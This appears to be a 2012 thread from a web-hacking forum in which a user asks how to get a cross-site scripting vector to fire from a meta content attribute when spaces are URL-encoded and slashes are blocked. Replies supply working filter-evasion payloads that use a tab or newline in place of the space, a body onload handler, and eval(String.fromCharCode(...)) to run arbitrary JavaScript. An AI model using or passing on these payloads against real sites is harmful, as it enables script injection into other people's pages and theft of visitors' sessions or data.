Hard XSS

sla.ckers.org is
ha.ckers sla.cking

How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Hard XSS

Posted by: Plitvix

Date: August 04, 2012 07:34PM

Hello people,
I am having problem getting one vector to work;

I inject into <head><meta content="my vector"/>
But problem is spaces are urlencoded to %20 and I cannot use / because of .htaccess URL rewrite(page not found)
Any ideas?

Options: Reply•Quote

Re: Hard XSS

Posted by: Razor4x

Date: August 06, 2012 01:55PM

u mean if u inject something like this:
"><body onload=alert(1);>
it will become like this:
"><body%20onload=alert(1);>

?

Options: Reply•Quote

Re: Hard XSS

Posted by: Plitvix

Date: August 12, 2012 03:49PM

yes.

Options: Reply•Quote

Re: Hard XSS

Posted by: Razor4x

Date: August 12, 2012 04:40PM

try something like this:
<body%09onload="alert(1)";>

Options: Reply•Quote

Re: Hard XSS

Posted by: cr101

Date: August 13, 2012 08:32AM

That should work. If you want to run whatever js from there, converting it to CharCode and then eval()-ing it should let you run anything you want without spaces or slashes.

So the final injection would be
"><body%09onload="eval(String.fromCharCode(convertedPayload))">

Also, if %09 doesn't work for some odd reason, you could try a newline (%0A).

Edited 1 time(s). Last edit at 08/13/2012 09:02AM by cr101.

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login